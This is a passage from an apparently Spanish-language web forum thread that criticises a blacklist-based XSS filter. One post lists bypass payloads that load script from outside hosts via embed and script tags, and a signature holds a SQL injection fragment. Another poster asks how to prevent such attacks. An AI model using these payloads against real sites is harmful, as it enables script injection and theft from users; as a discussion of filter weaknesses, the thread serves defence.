se me viene a la mente.. <embed src="//sirdarckcat.net/xss.swf"> o.. <script/src=//0x.lv/.. y la vdd me da flojera pensar en mas xD la cantidad de formas de burlar ese filtro son infinitas..
esta basado en blacklisting (primer error), usa una lista de tags muy incompleta (segundo error), asume que el codigo que mandara el atacante es valido (tercer error), no toma en cuenta las extensiones de los navegadores (cuarto error), y hay mas errores pero ando con flojera.
Saludos!!









Autor


,'mi novia anacleta',database(),@@version,'<?php)


En línea


Con el respeto que se merece, me gustaria saber como prevenir esos ataques
. Uno sabe que nadie es perfecto, pero con la ayuda de uno, se puede mejorar la programación.
Me gustaría que saber como usted crearía la función, para prevenirnos de los ataques XSS.



Si pues, solo quería ver otras ideas, para así mejorarla. Todos saben que nada es fácil y todo se puede.
Estamos para ayudarnos. 





siempre con php, no creo que javascript tenga funciones para enviar correos ya que se ejecuta de lado del cliente